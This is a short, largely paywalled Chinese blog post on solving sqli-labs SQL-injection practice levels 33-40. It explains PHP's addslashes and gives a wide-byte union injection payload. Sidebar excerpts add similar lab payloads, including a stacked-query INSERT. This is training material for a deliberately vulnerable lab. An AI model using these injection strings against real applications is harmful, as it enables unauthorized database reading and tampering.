sqli-labs33-40

最新推荐文章于 2022-11-20 23:50:45 发布
VIP文章 最新推荐文章于 2022-11-20 23:50:45 发布
阅读量206 收藏
点赞数
分类专栏: 靶场学习 PHP代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109543625
版权

Less33

php函数了解


addslashes

(PHP 4, PHP 5, PHP 7)

addslashes — 使用反斜线引用字符串
说明
addslashes ( string $str ) : string

返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。

一个使用 addslashes() 的例子是当你要往数据库中输入数据时。 例如,将名字 O'reilly 插入到数据库中,这就需要对其进行转义。 强烈建议使用 DBMS 指定的转义函数 (比如 MySQL 是 mysqli_real_escape_string(),PostgreSQL 是 pg_escape_string()),但是如果你使用的 DBMS 没有一个转义函数,并且使用 \ 来转义特殊字符,你可以使用这个函数。 仅仅是为了获取插入数据库的数据,额外的 \ 并不会插入。 当 PHP 指令 magic_quotes_sybase 被设置成 on 时,意味着插入 ' 时将使用 ' 进行转义。

PHP 5.4 之前 PHP 指令 magic_quotes_gpc 默认是 on, 实际上所有的 GETPOSTCOOKIE 数据都用被 addslashes() 了。 不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。 遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。

代码分析
在这里插入图片描述
payload

-1%df%27union%20select%201,database(),3--+
#payload和上一关的相同

在这里插入图片描述

最低0.47元/天 解锁文章
willowpy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(33)
weixin_30576827的博客
06-01 219
0X01构造闭合 发现‘ 被过滤了 那么 宽字节绕过 ?id=-1%df%27%20union%20select%201,database(),3%23 转载于:https://www.cnblogs.com/-zhong/p/10959798.html
sqli-labs————Less-33
Fly_鹏程万里
05-19 592
Less-33查看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqli-labs(40)
weixin_30894583的博客
06-02 256
0X01同样是构造闭合 这里的闭合条件是') 构造语句 ?id=1');insert into users values(100,'tx','tx')%23 在客户端mysql里面看看 嘿嘿 成功执行 切记 学习之路 少就是多 慢就是快 转载于:https://www.cnblogs.com/-zhong/p/10961635.html...
Sqli-labs less 33
weixin_33795743的博客
08-11 170
Less-33 本关和上一关的payload是一样的 http://127.0.0.1/sqli-labs/Less-33/?id=-1%df%27union%20select%201,user(),3--+ 从源代码中可以看到: 此处过滤使用函数addslashes() addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单...
sqli-labs/Less-33
m0_71299382的博客
11-20 172
sqli-labs第三十三关
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
安装sqli-labs
最新发布
10-22
安装sqli-labs
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1698
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli-labs详细全解31-40
qq_38415434的博客
01-11 923
sqli-labs详细全解31-40 第三十一关: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&id=1") and 1=12-- - 第三十二关: f
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1544
SQL-堆叠、盲注】
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 1921
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
sdcms代码审计之sql注入
willow_liang的博客
10-30 1683
1.漏洞注入点分析(黑名单 ) 2.注入payload构造(双参数构造,sqlmap绕过) 注册账号后发现网站有在线留言功能,可以查看能否注入 查看F函数 #F函数(get和post) function F($a,$b='') { $a=strtolower($a); if(!strpos($a,'.')) { $method='other'; } else { list($method,$a)=explode('.',$a,2); } switch ($method) {
代码审计之bluecms——sql注入
willow_liang的博客
10-28 782
bluecmsv1.6 php5.3+apache 1.漏洞注入点分析 1.找输入点,全局搜索接收参数的地方 2.找数据库语句定义,查看是否拼接了可控变量 3.根据源码挖注入 2.用phpstorm进行跟踪ad_js.php文件,burpsuite抓包进行sql注入测试 3.用phpstorm进行调试,跳到table函数,进行对数据表加blue前缀,和表的名称 function table($table) { global $pre; return $pre .$table ; 4.定位到函数ge
ORDER BY 注入学习以及sqli-labs46关学习
willow_liang的博客
11-08 688
ORDER BY 注入学习 分析第46关代码 **注入方式** 1. 直接添加注入语句 ?sort=(select …) 2. 利用一些函数,如rand函数。 ?rand(sql语句) ?rand(true)或者rand(fakse) 3. 利用and 例如?sort=1 and (sql语句)或者直接?sort=sql语句 可以报错或者时间盲注 方式2 http://127.0.0.1/sqli-labs-master/Less-46/?sort=rand(true) fals
phpcmsv9.0任意上传漏洞
willow_liang的博客
10-19 627
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,app
报错注入学习及利用报错注入Less-5
willow_liang的博客
10-29 619
二次查询注入 #需要用到的sql函数学习 (1)count():返回某列的行数 count(*):返回某列的所有行数 (2)rand():随机输出一个小于1的正数 (3)floor():输出的结果取整 (4)group by语句:结果分组 (5)concat():连接两条语句 二次查询实质就是在select语句中嵌套一个select语句,其中嵌套的语句称为子查询。 (1)select concat((select database())); (2)select concat((select data
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值